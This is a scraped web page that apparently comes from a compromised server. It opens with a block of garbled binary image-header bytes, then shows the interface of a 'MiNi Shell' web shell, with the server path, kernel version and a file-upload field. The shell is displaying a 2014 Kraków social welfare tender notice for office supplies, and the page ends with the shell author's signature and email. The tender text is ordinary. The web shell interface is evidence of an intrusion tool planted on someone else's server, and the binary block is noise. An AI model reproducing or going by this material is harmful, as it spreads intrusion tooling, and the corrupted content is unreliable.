JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140114/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140114/14082-N-2014.html

<p class="kh_header"><b>Kraków: Dostawa materiałów biurowych dla Miejskiego Ośrodka Pomocy Społecznej w Krakowie</b><br>
<b>Numer ogłoszenia: 14082 - 2014; data zamieszczenia: 14.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie , ul. Józefińska 14/002, 30-529 Kraków, woj. małopolskie, tel. 012 6165420, 6165424, faks 012 6165428.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych dla Miejskiego Ośrodka Pomocy Społecznej w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów biurowych, zwanych                    w dalej towarem, szczegółowo opisanych w formularzu cenowym, stanowiącym integralną część formularza ofertowego, stanowiącego załącznik nr 1 do Specyfikacji istotnych warunków zamówienia.  Warunki realizacji zamówienia zostały określone we wzorze umowy, stanowiącym załącznik nr 2 do Specyfikacji istotnych warunków zamówienia. 
Warunki realizacji zamówienia: 

1.	Dostawy będą wykonywane w formie dostaw częściowych na podstawie zamówień częściowych przekazywanych faxem lub e-mailem, w ilościach i asortymencie                     w nich wymienionych. Dostawa ma być zrealizowana w terminie do 4 dni roboczych od dnia przesłania zamówienia częściowego.
2.	Termin płatności do 14 dni od daty przyjęcia przez Zamawiającego prawidłowo wystawionej faktury, po zrealizowaniu dostawy częściowej.

Warunki dodatkowe realizacji zamówienia:
1.	Miejsce dostawy: magazyn centralny Zamawiającego, Kraków ul. Józefińska 14,                   w godzinach pracy Zamawiającego, tj.: od poniedziałku do piątku w godzinach              07:30 -14:30. 
2.	Wykonawca dostarczy zamawiany towar własnym transportem i na własny koszt             w sposób zapewniający jego całość i nienaruszalność. Opakowanie i sposób przewozu będą odpowiadać jego właściwościom.
3.	Wykonawca zapewni pracowników, którzy wniosą towar do pomieszczenia magazynu, który mieści się na parterze. 
4.	Towar będzie fabrycznie nowy, zdatny do natychmiastowego użytku zgodnie                   z przeznaczeniem (np. długopisy mają być wyposażone we wkłady itp.).                  Artykuły piśmiennicze nie mogą w trakcie użytkowania wylewać ani przerywać.
5.	W przypadku materiałów, których przydatność do użytku jest ograniczona czasowo -  dostarczone materiały muszą mieć termin przydatności co najmniej 1 rok od daty dostawy.
6.	Wykonawca udzieli przynajmniej 12 miesięcznej gwarancji, jednak na okres nie krótszy niż gwarancja producenta. W przypadku, gdy w wykazie materiałów Zamawiający oznaczył minimalny okres trwania gwarancji producenta Wykonawca zobowiązany jest zaoferować i dostarczać produkty, na które producent udziela gwarancji na okres co najmniej jak wskazany w omawianym wykazie przez Zamawiającego. Materiały piśmiennicze muszą posiadać przydatność do użytku               co najmniej 2 lata.
7.	Wykonawca ma obowiązek dostarczyć asortyment taki jak poda w ofercie,                    tj. te same marki i modele z wyjątkiem sytuacji, gdy Zamawiający wyrazi zgodę na zmianę materiału lub sprzętu na inny - o nie gorszej jakości i parametrach oraz nie krótszym okresie gwarancji. Przy czym nie powoduje to zmiany ceny.
8.	W przypadku stwierdzenia w trakcie realizacji umowy, że jakość dostarczonych materiałów i urządzeń jest niewystarczająca lub uległa pogorszeniu Zamawiający ma prawo żądać zmiany materiału na inny o wyższej jakości bez prawa Wykonawcy do zwiększenia Wynagrodzenia.
9.	W obu powyższych przypadkach model i markę nowych materiałów i sprzętu podaje Wykonawca oraz występuje pisemnie z wnioskiem o ich akceptację.                     Na wniosek Zamawiającego ma obowiązek dostarczyć próbkę materiału, wypożyczyć sprzęt lub przedłożyć jego opis, atesty lub informację o gwarancji producenta (potwierdzoną przez producenta lub jego przedstawiciela na Polskę). Materiały dołączone do oferty mogą zostać odebrane przez Wykonawcę na jego koszt.
10.	Wykonawca dostarczy zamawiany towar bez względu na zamawiane ilości, opakowania zbiorcze oraz minima logistyczne.
11.	Wykonawca wraz z dostawą dostarczy fakturę VAT. W przypadku niedostarczenia faktury VAT wraz z dostawą winna ona być dostarczona Zamawiającemu do 2 dni roboczych.
12.	W przypadku stwierdzenia wad w dostarczonym towarze Wykonawca wymieni towar w ciągu 3 dni od daty złożenia reklamacji.
13.	Zamawiający, na pisemny wniosek Wykonawcy, dopuszcza możliwość zmiany dostarczanego towaru w stosunku do towaru zaoferowanego w ofercie w przypadku,               gdy towar przestanie być produkowany lub nie będzie dostępny na rynku.
14.	W sytuacjach opisanych w ust. 13 Wykonawca przedstawi Zamawiającemu                      do akceptacji typ towaru oraz jego producenta. Zamawiający, w celu weryfikacji jakości towaru, zastrzega sobie prawo żądania od Wykonawcy udostępnienia próbki towaru lub przedłożenia jego opisu, atestów oraz informacji o gwarancji producenta, potwierdzonej przez producenta lub jego przedstawiciela na terenie Rzeczypospolitej Polskiej.
15.	Towar będzie oznaczony w taki sposób, aby była możliwa identyfikacja modelu                i producenta lub marki. W przypadku towaru dostarczanego w opakowaniach nazwa modelu i producenta lub marki będzie umieszczona na opakowaniu.                   Opakowanie będzie nienaruszone i nieotwierane. 
16.	Za odbiór dostawy odpowiada magazynier lub osoba go zastępująca. 
17.	Odbiór przez Zamawiającego przesyłki od kuriera nie oznacza odbioru dostawy.
18.	Zamawiający zastrzega sobie prawo do zmian ilości zamawianych materiałów biurowych w obrębie asortymentu wymienionego w załączniku do formularza ofertowego, stanowiącego załącznik nr 1 do niniejszej Specyfikacji..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany umowy wymagają formy pisemnej pod rygorem nieważności.
2.	Zamawiający dopuszcza zmianę treści umowy w stosunku do treści oferty,              na podstawie której dokonano wyboru Wykonawcy w następującym zakresie: zmiany dostarczanego towaru w stosunku do towaru zaoferowanego w ofercie w przypadku, gdy towar przestanie być produkowany lub nie będzie dostępny na rynku, wydłużenia okresu gwarancji, miejsca i godzin dostawy towaru.
3.	Zmiana treści umowy nie może być niekorzystna dla Zamawiającego.
4.	Zmiana umowy dokonana z naruszeniem powyższych postanowień jest nieważna</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Krakowie
ul. Józefińska 14
30-529 Kraków
pok. 003.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.01.2014 godzina 08:30, miejsce: Miejski Ośrodek Pomocy Społecznej w Krakowie
ul. Józefińska 14
30-529 Kraków
dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com